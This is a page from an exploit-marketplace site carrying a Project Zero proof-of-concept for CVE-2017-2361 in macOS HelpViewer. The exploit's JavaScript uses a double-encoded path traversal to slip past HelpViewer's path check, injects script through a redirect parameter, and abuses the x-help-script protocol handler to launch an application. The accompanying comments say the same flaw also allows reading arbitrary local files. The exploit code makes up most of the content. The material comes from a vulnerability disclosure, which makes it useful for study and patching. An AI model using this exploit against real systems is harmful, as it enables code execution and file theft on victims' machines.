[ Home ]  [ private ]  [ 0Day ]  [ discount ]  [ Get Gold ]  [ Betriebssysteme ]  [ Pentest ]  [ Suche ]  [ FAQ ]  [ Kontakt ]  [ Style ]  [ Prices in Gold ]   db: 39 443    
0day.today Exploit DB Official Facebook
0day.today Exploit DB Official Twitter
0day.today Exploit DB Official RSS Channel
Tor
We DO NOT use Telegram or any messengers / social networks!
We DO NOT use Telegram or any messengers / social networks!

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

 
0day.today - Größte Exploit-Datenbank der Welt.
Wähle Deine Sprache:  
English
English
Русский
Русский
Deutsch
Deutsch
Türkçe
Türkçe
Français
Français
Italiano
Italiano
Español
Español
Romania
Romania
Polskie
Polskie
العربية
العربية
Japan
Japan
China
China
Dinge, die Du wissen solltest:

Wir benutzen eine Hauptdomain DOMAIN_LINK

Wenn Du den Exploit kaufen, oder für einen Service bezahlen möchtest, musst Du Gold kaufen.
We accept currencies: [contact admin to find more]
           
Wir wollen nicht, dass Du unsere Seite als ein Werkzeug für Aktivitäten wie Hacking verwendest. Illegale Aktionen, die andere Benutzer oder Webseiten betreffen, für die Du keine Zugriffsrechte hast, führen dazu, dass der Account gebannt und alle Daten von diesem unwiderruflich gelöscht werden.

Die Administratoren dieser Seite benutzen nur die offiziellen Kontaktdaten. Achte auf Betrüger!
We DO NOT use Telegram or any messengers / social networks! We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Ich bin ein registrierter Benutzer von 0day.today. Ich möchte diesen Screen in Zukunft nicht mehr sehen
Was soll ich als Erstes tun ?
  1. Lies [ Vereinbarung ]
  2. Lies [ Senden ] Regeln
  3. Besuche [ FAQ ] page
  4. [ Registrieren ] Profil
  5. Bekommen [ GOLD ]
  6. Wenn Du möchtest [ Verkaufen ]
  7. Wenn Du möchtest [ Kaufen ]
  8. Wenn Du vergessen hast [ Account ]
  9. Fragen [ [email protected] ]


Hauptlinks


You can contact us by

Mail:
[email protected]
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
[ authorization ] [ registration ] [ Wiederherstellen ]
Kontaktiere uns
You can contact us by:
Mail:
[email protected]
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
0day.today Exploits Market and 0day Exploits Database

macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution and Arbitrary File Read Exploit

Autor
Google Security Research
Risiko
[
Security Risk Critical
]
0day-ID
0day-ID-27109
Kategorie
remote exploits
Datum hinzufügen
24-02-2017
CVE
CVE-2017-2361
Betriebssystem
macOS
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1040
 
HelpViewer is an application and using WebView to show a help file.
You can see it simply by the command:
open /Applications/Safari.app/Contents/Resources/Safari.help
 
or using "help:" scheme:
help:openbook=com.apple.safari.help
help:///Applications/Safari.app/Contents/Resources/Safari.help/Contents/Resources/index.html
 
HelpViewer's WebView has an inside protocol handler "x-help-script" that could be used to open an arbitrary local file. Therefore if we can run arbitrary Javascript code, we'll win easily and, of course, we can read an arbitrary local file with a XMLHttpRequest.
 
HelpViewer checks whether the path of the url is in a valid help file or not. But we can bypass this with a double encoded "../".
 
PoC:
document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=javascript%253adocument.write(1)";
 
The attached poc will pop up a Calculator.
 
Tested on macOS Sierra 10.12.1 (16B2659).
-->
 
<script>
 
/*
OSX: HelpViewer XSS leads to arbitrary file execution and arbitrary file read.
 
HelpViewer is an application and using WebView to show a help file.
You can see it simply by the command:
open /Applications/Safari.app/Contents/Resources/Safari.help
 
or using "help:" scheme:
help:openbook=com.apple.safari.help
help:///Applications/Safari.app/Contents/Resources/Safari.help/Contents/Resources/index.html
 
HelpViewer's WebView has an inside protocol handler "x-help-script" that could be used to open an arbitrary local file. Therefore if we can run arbitrary Javascript code, we'll win easily and, of course, we can read an arbitrary local file with a XMLHttpRequest.
 
HelpViewer checks whether the path of the url is in a valid help file or not. But we can bypass this with a double encoded "../".
 
PoC:
document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=javascript%253adocument.write(1)";
 
The attached poc will pop up a Calculator.
 
Tested on macOS Sierra 10.12.1 (16B2659).
 
*/
 
function main() {
    function second() {
        var f = document.createElement("iframe");
        f.onload = () => {
            f.contentDocument.location = "x-help-script://com.apple.machelp/scpt/OpnApp.scpt?:Applications:Calculator.app";
        };
 
        f.src = "help:openbook=com.apple.safari.help";
 
        document.documentElement.appendChild(f);
    }
 
    var url = "javascript%253aeval(atob('" + btoa(second.toString()) + "'));\nsecond();";
 
    document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=" + url;
}
 
main();
 
</script>

#  0day.today [2024-07-01]  #
0day.today Exploit Database kaufe und verkaufe Exploits (Local, Remote, DoS, PoC, etc.)
Einsendungen bitte an mr.inj3ct0r[at]gmail.com
Copyright © 2008-2024 0day Today Team